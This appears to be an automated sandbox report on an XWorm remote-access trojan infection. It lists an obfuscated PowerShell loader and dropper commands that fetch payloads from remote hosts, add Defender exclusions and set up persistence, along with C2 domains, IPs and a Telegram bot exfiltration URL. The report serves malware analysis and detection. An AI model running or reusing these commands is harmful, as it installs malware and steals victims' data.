'0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAEYAeQ' + [char]66 + 'mAGQAegAgACkALgAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJwAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACcAIAApAC4ARw' + [char]66 + 'lAHQATQAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACAAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACAALAAgAFsAbw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAWw' + [char]66 + 'dAF0AIAAoACAAJwAnAGsANw' + [char]66 + 'OAG4ATQ' + [char]66 + 'DAFAAQwAvAHcAYQ' + [char]66 + 'yAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'uAGkAYg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'EAEMAUA' + [char]66 + 'KAFUAJQAnACcAIAAsACAAIAAnACcARAAgAEQARA' + [char]66 + 'SAGUAZw' + [char]66 + '' + [char]66 + 'AHMAbQAnACcAIAAgACkAIAApADsAJwA7ACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAOw' + [char]66 + '9ADsA';$jPhaA = $jPhaA.replace('?','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\user\Desktop\DEVIS_VALIDE.js') ;powershell $jPhaA
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c del "C:\Users\user\Desktop\DEVIS_VALIDE.js"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 44 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://masclauxtoitures.fr/X67h2024kNWORM.txt
64.235.43.128
 malicious
moneyluckwork.ddns.net
malicious
moneyluck.duckdns.org
malicious
https://masclauxtoitures.fr/x67h2024knworm.txt
unknown
https://paste.ee/d/aGYNy/0
188.114.97.3
https://api.telegram.org/bot
unknown
http://crl.microsoft
unknown
http://ftp.desckvbrat.com.br
unknown
http://desckvbrat.com.br
unknown
https://pastebin.com/raw
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
http://crl.microsoftsl
unknown
https://www.google.com
unknown
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1F61296E2D13B1021028%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20WG6__62%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
149.154.167.220
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://cdnjs.cloudflare.com
unknown
http://crl.micft.cMicRosof
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
http://nuget.org/NuGet.exe
unknown
https://masclauxtoitures.fr
unknown
http://crl.microsoftEO
unknown
https://pastebin.com/raw/GF0ptUGb
104.20.3.235
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://masclauxtoitures.fr
unknown
http://www.microsoft.i
unknown
https://www.google.com;
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
https://masclauxtoitures.fr/X67h2024kNWORM.txtP
unknown
https://github.com/Pester/Pester
unknown
https://paste.ee/d/I1o5h/0
188.114.97.3
https://paste.ee/d/Nbuiz/0P
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://pastebin.com/raw/GF0ptUGb)
unknown
https://analytics.paste.ee;
unknown
https://paste.ee/d/aGYNy/0P
unknown
https://aka.ms/pscore68
unknown
https://pastebin.com/raw/CPCMnN7k
104.20.3.235
http://pastebin.com
unknown
https://pastebin.com
unknown
https://themes.googleusercontent.com
unknown
https://paste.ee/d/Nbuiz/0
188.114.97.3
http://crl.micros
unknown
There are 43 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
moneyluck.duckdns.org
178.73.218.6
 malicious
masclauxtoitures.fr
64.235.43.128
 malicious
desckvbrat.com.br
191.252.83.213
 malicious
ftp.desckvbrat.com.br
unknown
 malicious
paste.ee
188.114.97.3
api.telegram.org
149.154.167.220
pastebin.com
104.20.3.235

IPs

IP
Domain
Country
Malicious
64.235.43.128
masclauxtoitures.fr
United States
malicious
191.252.83.213
desckvbrat.com.br
Brazil
malicious
178.73.218.6
moneyluck.duckdns.org
Sweden
malicious
104.20.3.235
pastebin.com
United States
149.154.167.220
api.telegram.org
United Kingdom
188.114.97.3
paste.ee
European Union

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Update Drivers NVIDEO_lme
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Update Drivers NVIDEO_nzm
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\1F61296E2D13B1021028
B6D8BCCDF123CEAC6B9642AD3500D4E0B3D30B9C9DD2D29499D38C02BD8F9982
There are 23 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
 malicious
1D3332B9000
trusted library allocation
page read and write
 malicious
15586871000
trusted library allocation
page read and write
 malicious
24FE2752000
trusted library allocation
page read and write
 malicious
20ECE7E8000
trusted library allocation
page read and write
 malicious
1D3335B0000
trusted library allocation
page read and write
 malicious
1558655B000
trusted library allocation
page read and write
 malicious
20ECE53D000
trusted library allocation
page read and write
 malicious
1DE3D7DB000
trusted library allocation
page read and write
 malicious
1E6808CE000
trusted library allocation
page read and write
 malicious
1DE3DAEF000
trusted library allocation
page read and write
 malicious
1E6805BB000
trusted library allocation
page read and write
 malicious
182A8E49000
heap
page read and write
220D4A4E000
trusted library allocation
page read and write
244E1794000
heap
page read and write
1709A814000
heap
page read and write
17098DF5000
heap
page read and write
25F80033000
trusted library allocation
page read and write
7FFD9B730000
trusted library allocation
page execute and read and write
20EDDF31000
trusted library allocation
page read and write
1D332E05000
trusted library allocation
page read and write
8C896FE000
stack
page read and write
80C7DFE000
stack
page read and write
1DE3D2FB000
trusted library allocation
page read and write
25F80102000
trusted library allocation
page read and write
1D34AD51000
heap
page read and write
1E6F4F43000
heap
page read and write
1628D4E7000
trusted library allocation
page read and write
2EE0000
heap
page read and write
1D333259000
trusted library allocation
page read and write
1628D3C4000
trusted library allocation
page read and write
CCFA37D000
stack
page read and write
2EA6000
trusted library allocation
page execute and read and write
1628DA93000
trusted library allocation
page read and write
305F000
stack
page read and write
516B1FE000
stack
page read and write
E8BBFFA000
stack
page read and write
20923201000
trusted library allocation
page read and write
3EE467E000
stack
page read and write
1D279AF1000
heap
page read and write
2E2E000
stack
page read and write
220D1490000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
177D913C000
trusted library allocation
page read and write
11A4000
trusted library allocation
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
7FFD9B864000
trusted library allocation
page read and write
2B698960000
trusted library section
page read and write
20EE6338000
heap
page read and write
1A0667E000
stack
